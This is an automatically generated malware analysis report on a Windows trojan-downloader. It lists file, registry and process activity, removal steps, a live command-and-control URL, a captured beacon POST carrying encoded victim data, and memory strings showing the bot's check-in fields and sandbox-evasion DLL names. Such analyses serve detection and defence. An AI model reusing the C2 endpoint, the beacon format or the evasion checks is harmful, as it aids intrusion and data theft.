Trojan.Win32.Inject.sbkt (Kaspersky), Trojan.GenericKD.2070492 (AdAware), TrojanLoadMoney.YR, TrojanDownloaderVundo.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 36b45e5bfb2a8948516251a93752d081
SHA1: 53d77e6dbda8673080f0afbbc9b86cea4fc509d7
SHA256: e9b7f72295578608508ba8ae5df42f9b81f9b1f3139d9264e46d5fd00f286988
SSDeep: 3072:VwJ52Y7ZoH5XJacW4d1VCoiP5lIuKWc7UJYzxj8CSTn:VwHysrwiH4CYz3STn
Size: 110437 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-05-11 23:03:30
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:2040
The Trojan injects its code into the following process(es):
%original file name%.exe:844
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:844 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\config\software (402 bytes)
%System%\config\SOFTWARE.LOG (1603 bytes)
The Trojan deletes the following file(s):
%WinDir%\306197153\ADService (0 bytes)
The process %original file name%.exe:2040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp\concierges.dll (2484 bytes)
%Documents and Settings%\%current user%\Application Data\gambesons.x (1568 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp\concierges.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (0 bytes)
Registry activity
The process %original file name%.exe:844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 C7 D7 4B 39 B7 AB 20 CE 82 7B 0B 18 D7 B3 0F"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"*306197153"
The process %original file name%.exe:2040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC 49 B8 A2 F0 51 8E 0A A9 9F DE B5 2D 4B 8F B1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:2040
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\config\software (402 bytes)
%System%\config\SOFTWARE.LOG (1603 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp\concierges.dll (2484 bytes)
%Documents and Settings%\%current user%\Application Data\gambesons.x (1568 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: NirSoft
Product Name: DownTester
Product Version: 1.25.10.3
Legal Copyright: Copyright (c) 2009 - 2010 Nir Sofer
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.25.10.3
File Description: DownTester
Comments:
Language: English (United States)
Company Name: NirSoftProduct Name: DownTesterProduct Version: 1.25.10.3Legal Copyright: Copyright (c) 2009 - 2010 Nir SoferLegal Trademarks: Original Filename: Internal Name: File Version: 1.25.10.3File Description: DownTesterComments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23144 | 23552 | 4.4491 | e50f4a1111bafdc813b1f7ec153b8ea9 |
.rdata | 28672 | 4558 | 4608 | 3.62903 | 640f709ec19b4ed0455a4c64e5934d5e |
.data | 36864 | 108472 | 1024 | 3.37648 | 54c75104a38a6f79dc7a8d3b020a9139 |
.ndata | 147456 | 32768 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 180224 | 7336 | 7680 | 2.89384 | 97ee6ff03cc1ffae2acfafbd13faf3dc |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://23.228.100.130/~vpnmaste/panel/gate.php | |
hxxp://23.228.100.130:80/~vpnmaste/panel/gate.php |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /~vpnmaste/panel/gate.php HTTP/1.1
Host: 23.228.100.130:80
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 468
a=bW5raGlmY3pheHVyc3BldmR5dHFsZ2J3b2o6Z2RlYnl2d3Rxcm9saWphdXBtaHpmY3hza24=&b=vHR5wGU6x25vZXbfY3r1qWQ6MTE4YtA0YtA3NtQ1NDErMWUmYTcrYTbeODA2ZDYrNtI2OTZgvHBmqXY6YWRhqW58YXJnqDj4ODZ8Z2VoZDjeZXNlpG9svGNuwgVtOnF8x3M6V19YUHr2ZXI6pnEoMC44vG5fpDk0LnB8xgV3OnF8&c=ijggdddabbyyvvwtttqqnnol
HTTP/1.1 404 Not Found
Date: Thu, 15 Jan 2015 00:22:36 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Accept-Ranges: bytes
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
1.....1.....95..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html>. <head>. <title>..579..404 Not Found</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <style type="text/css">. body {. .font-family: Verdana, Arial, Helvetica, sans-serif;. .font-size: 12px;. .background-color:#367E8E;. .scrollbar-base-color: #005B70;. .scrollbar-arrow-color: #F3960B;. .scrollbar-DarkShadow-Color: #000000;. .color: #FFFFFF;....margin:0;. }. a { color:#021f25; text-decoration:none}. h1 {. .font-size: 18px;. .color: #FB9802;. .padding-bottom: 10px;. .background-image: url(sys_cpanel/images/bottombody.jpg);. .background-repeat: repeat-x;. .padding:5px 0 10px 15px;....margin:0;. }. #body-content p {. .padding-left: 25px;. .padding-right: 25px;. .line-height: 18px;. .padding-top: 5px;. .padding-bottom: 5px;. }. h2 {. .font-size: 14px;. .font-weight: bold;. .color: #FF9900;. .padding-left: 15px;. }. </style>. </head>. <body>. <div id="body-content"> .<!-- start content-->..<!-- . instead of REQUEST_URI, we could show absolute URL via:. hXXp://HTTP_HOST/REQUEST_URI. but what if its hXXps:// or other protocol?. . SE
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_844:
`:%.jN
`:%.jN
tL
tL
L1NISvhFIzXBFvDjm0Xx`qZ6F3igo78UuVaYeD3qwmYendPBGejPjmpV3ZBKxBE4ijl4ARmIGGfiGXhMky`5jYpnoLV3Q4AjVt2PH7StnaS9ktdpZPECFY0OtGzJ4fS6ipHfYOb-QKmkHFYoLWOmyRTGOyxbgzO051ltrsDm0UEMoc6XaKEyV`HuyIaapEUP7Pbg`e0fIS2t-GMTVoKbh8sbiANge3aP6ApyiZjVmk0WaGw-1iJ1aca-S-yjElZfQv6UNG`laNR0VW9CTQMFb67QCZXRkn4UZPO`ljg0b9tQKpGARH7XVKMgoZbA7RcBnuODMeslN1ZL9YFHw4pE`RYrPY82QEXL`e28Ub2KJVkbgTQDuN9mlKQLKGds6BbK0cu7u9miye8EGO-xRzlOO4hoXEvCxuZNjL-CrzM0OwvEeQIlK8cJTSeSEEKX5eyHlxFH3J`yzp2wlecWHj8lfNQXE50rHsXTewkyCsXNGImzuX73Q1TM1hARso-V-L`CwCkhvQhBIEFn2pD4F`eBRmkxM-zp6CyASbmuZNgSmYhIX6ci2xRurnTMC4bhfr4L0tHgaIoNU`tHoW6z4mVbtbQ4M8F4HixPQ`ZAxkPAvQMzC8OuAHDUg3GM606rSXXdinDU16GUeDMTVOpR2cZSO9-fTrWNcLCbsKys2pbuwyfmFWzlZ9dtLL03spzOK2Z90TuoLrU2fvi4xfRi2zy1au-gsTf-aZK6wwOyDHBZGLUtL9N`I5NQZqiiD4gQUoCbSbqFqZ2dRIrB7-gG5x63bMzxfgYfaD09MotFYCuAnyKLPwexl1tkpZ6InjxJhBC61oY9veVzmK79tswQiZKEuunwPR4O4ovdJXmZ-c8yFmD7KrqiZn8GXdGMb0KZVTzmMNaNSFwa4Cf4md7yrEZ8RQJ0yt237wIZQ6SxPJsz3i-cd0EpXcd9KNh2motDTNgK`U0yW0h3kbbG13BHNeXcVtfTBf4-`BMipo00SeeTAfUUrRhO8bCADM2gkHX76R8IPEfHn-ZWlw~~
L1NISvhFIzXBFvDjm0Xx`qZ6F3igo78UuVaYeD3qwmYendPBGejPjmpV3ZBKxBE4ijl4ARmIGGfiGXhMky`5jYpnoLV3Q4AjVt2PH7StnaS9ktdpZPECFY0OtGzJ4fS6ipHfYOb-QKmkHFYoLWOmyRTGOyxbgzO051ltrsDm0UEMoc6XaKEyV`HuyIaapEUP7Pbg`e0fIS2t-GMTVoKbh8sbiANge3aP6ApyiZjVmk0WaGw-1iJ1aca-S-yjElZfQv6UNG`laNR0VW9CTQMFb67QCZXRkn4UZPO`ljg0b9tQKpGARH7XVKMgoZbA7RcBnuODMeslN1ZL9YFHw4pE`RYrPY82QEXL`e28Ub2KJVkbgTQDuN9mlKQLKGds6BbK0cu7u9miye8EGO-xRzlOO4hoXEvCxuZNjL-CrzM0OwvEeQIlK8cJTSeSEEKX5eyHlxFH3J`yzp2wlecWHj8lfNQXE50rHsXTewkyCsXNGImzuX73Q1TM1hARso-V-L`CwCkhvQhBIEFn2pD4F`eBRmkxM-zp6CyASbmuZNgSmYhIX6ci2xRurnTMC4bhfr4L0tHgaIoNU`tHoW6z4mVbtbQ4M8F4HixPQ`ZAxkPAvQMzC8OuAHDUg3GM606rSXXdinDU16GUeDMTVOpR2cZSO9-fTrWNcLCbsKys2pbuwyfmFWzlZ9dtLL03spzOK2Z90TuoLrU2fvi4xfRi2zy1au-gsTf-aZK6wwOyDHBZGLUtL9N`I5NQZqiiD4gQUoCbSbqFqZ2dRIrB7-gG5x63bMzxfgYfaD09MotFYCuAnyKLPwexl1tkpZ6InjxJhBC61oY9veVzmK79tswQiZKEuunwPR4O4ovdJXmZ-c8yFmD7KrqiZn8GXdGMb0KZVTzmMNaNSFwa4Cf4md7yrEZ8RQJ0yt237wIZQ6SxPJsz3i-cd0EpXcd9KNh2motDTNgK`U0yW0h3kbbG13BHNeXcVtfTBf4-`BMipo00SeeTAfUUrRhO8bCADM2gkHX76R8IPEfHn-ZWlw~~
uR2mlpMYv5W4VaWL9xsPDJQnbNe-RWVOw-eZPGEtf6dOEE5KjD0UeQfjZ3fi8qtGvtpJX3JZznnK7rIp3pidhaSa6f2`WMQlpSSldJf5nq3ICieMdKeqlc-uYmu7ZsiW3xNje09YsXIC0UzXFK1JRJ2Js-lbSCt72YHkB7kn4BhJdop2Y9zj4p93CqlTbT2WUwhjuv3NXc4nY3RweDpr4TcsKhjuLPkmbBedMY0uGavBaXr5mXRcmguEdW2wpN7hSl4zG3hlAfnFQypu5bcu9NTp-Yh`2AOOkz7ESmgINczE8xYbxufC54rtN2soEJ8mnDIVGyaHb2SN6kjo73dCh1dvznECtF0q2O3o4Ol`VhfPTIX9JfOsgoJY`-YNMIXrjpeNj54bwpTa8ztzieNgq17ilaVGQjfRAt6-RHefOjRSSsgNY0eDnmyoVRW3YJMAH7kewelPoyZMOyi9bJl4wIA-Z-sEz40GeoqekIVOU4b`KVujg3EAp6-R7hpalFlpmMhN9FgSgQtYLrTpdfp3ZQ54EsmglgmWHNyR2z5milwrVsWEfzituwQr75q7Ui2vqOHXZrgHH9mBs`sv8z57OUvwgKQIJq`1RCT0LJaQmbwf5m23hHwaL7cMi4c1vRupB9BzWeUfFQaEOPd6li-MDQGB9kCqaq`HP1CNi66hgvU6VM6IkjSozXTfNTvdPo`r`wq0rfKuKo8gb`SbpLluUsqIyCvxXBSQj9nHxJKoNR92UXl0BlO4UZyXDKbyD49fO2oTgXk22ku-KRTkI4FkQ45okEA5JVHbAi-qMDMsG1v9l5mvjBQxr14gbhZFzkHqTLoRZBG9c6Q5IqsoxVUun68-KfL4BVvZXKAThnMcyFno4VPu6TLKVVMdUef3-lXkQRrRirk`IqKVttxx7NYld793l17ASa0QyqhjvtTGofic8iY6W3u012yaOuINdZA9BQlj99icwj0s67y-rikCvm4PmbHKZCdI7kc92q2ftiDYbNHFFJXHNZqNPi6rSJZYKhyCiiJjna00xjA9l`747bWXqfZeVnxB24MdwxlCcIDvNWQFk7wXvME0t-Bej3NgnN0t1ugB19nUApQUQPdaemUviFhpllFjI0s~
uR2mlpMYv5W4VaWL9xsPDJQnbNe-RWVOw-eZPGEtf6dOEE5KjD0UeQfjZ3fi8qtGvtpJX3JZznnK7rIp3pidhaSa6f2`WMQlpSSldJf5nq3ICieMdKeqlc-uYmu7ZsiW3xNje09YsXIC0UzXFK1JRJ2Js-lbSCt72YHkB7kn4BhJdop2Y9zj4p93CqlTbT2WUwhjuv3NXc4nY3RweDpr4TcsKhjuLPkmbBedMY0uGavBaXr5mXRcmguEdW2wpN7hSl4zG3hlAfnFQypu5bcu9NTp-Yh`2AOOkz7ESmgINczE8xYbxufC54rtN2soEJ8mnDIVGyaHb2SN6kjo73dCh1dvznECtF0q2O3o4Ol`VhfPTIX9JfOsgoJY`-YNMIXrjpeNj54bwpTa8ztzieNgq17ilaVGQjfRAt6-RHefOjRSSsgNY0eDnmyoVRW3YJMAH7kewelPoyZMOyi9bJl4wIA-Z-sEz40GeoqekIVOU4b`KVujg3EAp6-R7hpalFlpmMhN9FgSgQtYLrTpdfp3ZQ54EsmglgmWHNyR2z5milwrVsWEfzituwQr75q7Ui2vqOHXZrgHH9mBs`sv8z57OUvwgKQIJq`1RCT0LJaQmbwf5m23hHwaL7cMi4c1vRupB9BzWeUfFQaEOPd6li-MDQGB9kCqaq`HP1CNi66hgvU6VM6IkjSozXTfNTvdPo`r`wq0rfKuKo8gb`SbpLluUsqIyCvxXBSQj9nHxJKoNR92UXl0BlO4UZyXDKbyD49fO2oTgXk22ku-KRTkI4FkQ45okEA5JVHbAi-qMDMsG1v9l5mvjBQxr14gbhZFzkHqTLoRZBG9c6Q5IqsoxVUun68-KfL4BVvZXKAThnMcyFno4VPu6TLKVVMdUef3-lXkQRrRirk`IqKVttxx7NYld793l17ASa0QyqhjvtTGofic8iY6W3u012yaOuINdZA9BQlj99icwj0s67y-rikCvm4PmbHKZCdI7kc92q2ftiDYbNHFFJXHNZqNPi6rSJZYKhyCiiJjna00xjA9l`747bWXqfZeVnxB24MdwxlCcIDvNWQFk7wXvME0t-Bej3NgnN0t1ugB19nUApQUQPdaemUviFhpllFjI0s~
libgcj-13.dll
libgcj-13.dll
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
%s--%s
%s--%s
%s\B%i.tmp
%s\B%i.tmp
http.
http.
hXXp://
hXXp://
hXXps://
hXXps://
%y%m%d
%y%m%d
%s:%i
%s:%i
%s\browser%li.html
%s\browser%li.html
%s "%s"
%s "%s"
Software\Microsoft\Windows NT\CurrentVersion\Windows\load
Software\Microsoft\Windows NT\CurrentVersion\Windows\load
%s\%s.exe
%s\%s.exe
Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore
Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore
NoWindowsUpdate
NoWindowsUpdate
%s@%s
%s@%s
%s\I%li.bat
%s\I%li.bat
%s\U%li.bat
%s\U%li.bat
%s\Google\Chrome\Application\chrome.exe
%s\Google\Chrome\Application\chrome.exe
%s\Internet Explorer\iexplore.exe
%s\Internet Explorer\iexplore.exe
%s\Opera\opera.exe
%s\Opera\opera.exe
%s\Mozilla Firefox\firefox.exe
%s\Mozilla Firefox\firefox.exe
%s\Maxthon3\Bin\Maxthon.exe
%s\Maxthon3\Bin\Maxthon.exe
Google Chrome
Google Chrome
Opera
Opera
Firefox
Firefox
chrome.exe
chrome.exe
opera.exe
opera.exe
firefox.exe
firefox.exe
iexplore.exe
iexplore.exe
Maxthon.exe
Maxthon.exe
%s(%s)
%s(%s)
|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:
|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:
|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|
|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|
%s%s%i%s%s%s%s%s
%s%s%i%s%s%s%s%s
%s:%s
%s:%s
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
|type:response|uid:%s|taskid:%i|return:%s|busy:%s|
|type:response|uid:%s|taskid:%i|return:%s|busy:%s|
autoruns.exe
autoruns.exe
explorer.exe
explorer.exe
SbieDll.dll
SbieDll.dll
snxhk.dll
snxhk.dll
dbghelp.dll
dbghelp.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
76487-640-1457236-23837
76487-640-1457236-23837
76487-644-3177037-23510
76487-644-3177037-23510
55274-640-2673064-23950
55274-640-2673064-23950
76497-640-6308873-23835
76497-640-6308873-23835
Windows Task Manager
Windows Task Manager
%s %i %i
%s %i %i
.hidden
.hidden
filesearch.stop
filesearch.stop
%s@%s:%i
%s@%s:%i
%s\System32\drivers\etc\protocol
%s\System32\drivers\etc\protocol
%s\Microsoft.NET\Framework\
%s\Microsoft.NET\Framework\
v4.0.30319
v4.0.30319
v2.0.50727
v2.0.50727
\explorer.exe
\explorer.exe
HTTP/1.
HTTP/1.
text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
application/x-www-form-urlencoded
application/x-www-form-urlencoded
HTTP/1.
HTTP/1.
dnsapi.dll
dnsapi.dll
%s & %s
%s & %s
Software\Microsoft\Windows\CurrentVersion\
Software\Microsoft\Windows\CurrentVersion\
\Microsoft\Windows
\Microsoft\Windows
%s%s%s%s%i%s%s
%s%s%s%s%i%s%s
:Zone.Identifier
:Zone.Identifier
%s\K%li.bat
%s\K%li.bat
document.write(unescape('%s'));
document.write(unescape('%s'));
operator
operator
operator
operator
global constructors keyed to
global constructors keyed to
global destructors keyed to
global destructors keyed to
operator""
operator""
VirtualQuery failed for %d bytes at address %p
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
Unknown pseudo relocation bit size %d.
fc_key
fc_key
use_fc_key
use_fc_key
hXXp://23.228.100.130/~vpnmaste/panel/gate.php
hXXp://23.228.100.130/~vpnmaste/panel/gate.php
v1.0.8
v1.0.8
~vpnmaste/panel/gate.php
~vpnmaste/panel/gate.php
23.228.100.130
23.228.100.130
%WinDir%
%WinDir%
%Program Files%
%Program Files%
%Documents and Settings%\All Users
%Documents and Settings%\All Users
%Documents and Settings%\%current user%
%Documents and Settings%\%current user%
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\All Users\Start Menu\Programs\Startup
%Documents and Settings%\All Users\Start Menu\Programs\Startup
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Opera\opera.exe
%Program Files%\Opera\opera.exe
%Program Files%\Mozilla Firefox\firefox.exe
%Program Files%\Mozilla Firefox\firefox.exe
%Program Files%\Maxthon3\Bin\Maxthon.exe
%Program Files%\Maxthon3\Bin\Maxthon.exe
e.exe
e.exe
ull)OaJTKCDfzKhXXp://23.228.100.130/~vpnmaste/panel/gate.php80buJEAmbGSSv1.0.8
ull)OaJTKCDfzKhXXp://23.228.100.130/~vpnmaste/panel/gate.php80buJEAmbGSSv1.0.8
306197153
306197153
c:\%original file name%.exe
c:\%original file name%.exe
%WinDir%\306197153
%WinDir%\306197153
%WinDir%\306197153\ADService
%WinDir%\306197153\ADService
NICK
NICK
JOIN
JOIN
PRIVMSG
PRIVMSG
GetProcessHeap
GetProcessHeap
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegFlushKey
RegFlushKey
RegOpenKeyExA
RegOpenKeyExA
ShellExecuteA
ShellExecuteA
InternetOpenUrlA
InternetOpenUrlA
.text
.text
P`.data
P`.data
.rdata
.rdata
`@.eh_fram
`@.eh_fram
0@.bss
0@.bss
.idata
.idata
VXa# %D
VXa# %D
&%spie);
&%spie);
.kedD
.kedD
.CRT
.CRT
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.DLL
ADVAPI32.DLL
msvcrt.dll
msvcrt.dll
SHELL32.DLL
SHELL32.DLL
USER32.dll
USER32.dll
WININET.DLL
WININET.DLL
Okernel32.dll
Okernel32.dll
advapi32.dll
advapi32.dll
Aicmp.dll
Aicmp.dll
surlmon.dll
surlmon.dll
gws2_32.dll
gws2_32.dll
rpcrt4.dll
rpcrt4.dll
%original file name%.exe_844_rwx_00400000_00087000:
`:%.jN
`:%.jN
tL
tL
L1NISvhFIzXBFvDjm0Xx`qZ6F3igo78UuVaYeD3qwmYendPBGejPjmpV3ZBKxBE4ijl4ARmIGGfiGXhMky`5jYpnoLV3Q4AjVt2PH7StnaS9ktdpZPECFY0OtGzJ4fS6ipHfYOb-QKmkHFYoLWOmyRTGOyxbgzO051ltrsDm0UEMoc6XaKEyV`HuyIaapEUP7Pbg`e0fIS2t-GMTVoKbh8sbiANge3aP6ApyiZjVmk0WaGw-1iJ1aca-S-yjElZfQv6UNG`laNR0VW9CTQMFb67QCZXRkn4UZPO`ljg0b9tQKpGARH7XVKMgoZbA7RcBnuODMeslN1ZL9YFHw4pE`RYrPY82QEXL`e28Ub2KJVkbgTQDuN9mlKQLKGds6BbK0cu7u9miye8EGO-xRzlOO4hoXEvCxuZNjL-CrzM0OwvEeQIlK8cJTSeSEEKX5eyHlxFH3J`yzp2wlecWHj8lfNQXE50rHsXTewkyCsXNGImzuX73Q1TM1hARso-V-L`CwCkhvQhBIEFn2pD4F`eBRmkxM-zp6CyASbmuZNgSmYhIX6ci2xRurnTMC4bhfr4L0tHgaIoNU`tHoW6z4mVbtbQ4M8F4HixPQ`ZAxkPAvQMzC8OuAHDUg3GM606rSXXdinDU16GUeDMTVOpR2cZSO9-fTrWNcLCbsKys2pbuwyfmFWzlZ9dtLL03spzOK2Z90TuoLrU2fvi4xfRi2zy1au-gsTf-aZK6wwOyDHBZGLUtL9N`I5NQZqiiD4gQUoCbSbqFqZ2dRIrB7-gG5x63bMzxfgYfaD09MotFYCuAnyKLPwexl1tkpZ6InjxJhBC61oY9veVzmK79tswQiZKEuunwPR4O4ovdJXmZ-c8yFmD7KrqiZn8GXdGMb0KZVTzmMNaNSFwa4Cf4md7yrEZ8RQJ0yt237wIZQ6SxPJsz3i-cd0EpXcd9KNh2motDTNgK`U0yW0h3kbbG13BHNeXcVtfTBf4-`BMipo00SeeTAfUUrRhO8bCADM2gkHX76R8IPEfHn-ZWlw~~
L1NISvhFIzXBFvDjm0Xx`qZ6F3igo78UuVaYeD3qwmYendPBGejPjmpV3ZBKxBE4ijl4ARmIGGfiGXhMky`5jYpnoLV3Q4AjVt2PH7StnaS9ktdpZPECFY0OtGzJ4fS6ipHfYOb-QKmkHFYoLWOmyRTGOyxbgzO051ltrsDm0UEMoc6XaKEyV`HuyIaapEUP7Pbg`e0fIS2t-GMTVoKbh8sbiANge3aP6ApyiZjVmk0WaGw-1iJ1aca-S-yjElZfQv6UNG`laNR0VW9CTQMFb67QCZXRkn4UZPO`ljg0b9tQKpGARH7XVKMgoZbA7RcBnuODMeslN1ZL9YFHw4pE`RYrPY82QEXL`e28Ub2KJVkbgTQDuN9mlKQLKGds6BbK0cu7u9miye8EGO-xRzlOO4hoXEvCxuZNjL-CrzM0OwvEeQIlK8cJTSeSEEKX5eyHlxFH3J`yzp2wlecWHj8lfNQXE50rHsXTewkyCsXNGImzuX73Q1TM1hARso-V-L`CwCkhvQhBIEFn2pD4F`eBRmkxM-zp6CyASbmuZNgSmYhIX6ci2xRurnTMC4bhfr4L0tHgaIoNU`tHoW6z4mVbtbQ4M8F4HixPQ`ZAxkPAvQMzC8OuAHDUg3GM606rSXXdinDU16GUeDMTVOpR2cZSO9-fTrWNcLCbsKys2pbuwyfmFWzlZ9dtLL03spzOK2Z90TuoLrU2fvi4xfRi2zy1au-gsTf-aZK6wwOyDHBZGLUtL9N`I5NQZqiiD4gQUoCbSbqFqZ2dRIrB7-gG5x63bMzxfgYfaD09MotFYCuAnyKLPwexl1tkpZ6InjxJhBC61oY9veVzmK79tswQiZKEuunwPR4O4ovdJXmZ-c8yFmD7KrqiZn8GXdGMb0KZVTzmMNaNSFwa4Cf4md7yrEZ8RQJ0yt237wIZQ6SxPJsz3i-cd0EpXcd9KNh2motDTNgK`U0yW0h3kbbG13BHNeXcVtfTBf4-`BMipo00SeeTAfUUrRhO8bCADM2gkHX76R8IPEfHn-ZWlw~~
uR2mlpMYv5W4VaWL9xsPDJQnbNe-RWVOw-eZPGEtf6dOEE5KjD0UeQfjZ3fi8qtGvtpJX3JZznnK7rIp3pidhaSa6f2`WMQlpSSldJf5nq3ICieMdKeqlc-uYmu7ZsiW3xNje09YsXIC0UzXFK1JRJ2Js-lbSCt72YHkB7kn4BhJdop2Y9zj4p93CqlTbT2WUwhjuv3NXc4nY3RweDpr4TcsKhjuLPkmbBedMY0uGavBaXr5mXRcmguEdW2wpN7hSl4zG3hlAfnFQypu5bcu9NTp-Yh`2AOOkz7ESmgINczE8xYbxufC54rtN2soEJ8mnDIVGyaHb2SN6kjo73dCh1dvznECtF0q2O3o4Ol`VhfPTIX9JfOsgoJY`-YNMIXrjpeNj54bwpTa8ztzieNgq17ilaVGQjfRAt6-RHefOjRSSsgNY0eDnmyoVRW3YJMAH7kewelPoyZMOyi9bJl4wIA-Z-sEz40GeoqekIVOU4b`KVujg3EAp6-R7hpalFlpmMhN9FgSgQtYLrTpdfp3ZQ54EsmglgmWHNyR2z5milwrVsWEfzituwQr75q7Ui2vqOHXZrgHH9mBs`sv8z57OUvwgKQIJq`1RCT0LJaQmbwf5m23hHwaL7cMi4c1vRupB9BzWeUfFQaEOPd6li-MDQGB9kCqaq`HP1CNi66hgvU6VM6IkjSozXTfNTvdPo`r`wq0rfKuKo8gb`SbpLluUsqIyCvxXBSQj9nHxJKoNR92UXl0BlO4UZyXDKbyD49fO2oTgXk22ku-KRTkI4FkQ45okEA5JVHbAi-qMDMsG1v9l5mvjBQxr14gbhZFzkHqTLoRZBG9c6Q5IqsoxVUun68-KfL4BVvZXKAThnMcyFno4VPu6TLKVVMdUef3-lXkQRrRirk`IqKVttxx7NYld793l17ASa0QyqhjvtTGofic8iY6W3u012yaOuINdZA9BQlj99icwj0s67y-rikCvm4PmbHKZCdI7kc92q2ftiDYbNHFFJXHNZqNPi6rSJZYKhyCiiJjna00xjA9l`747bWXqfZeVnxB24MdwxlCcIDvNWQFk7wXvME0t-Bej3NgnN0t1ugB19nUApQUQPdaemUviFhpllFjI0s~
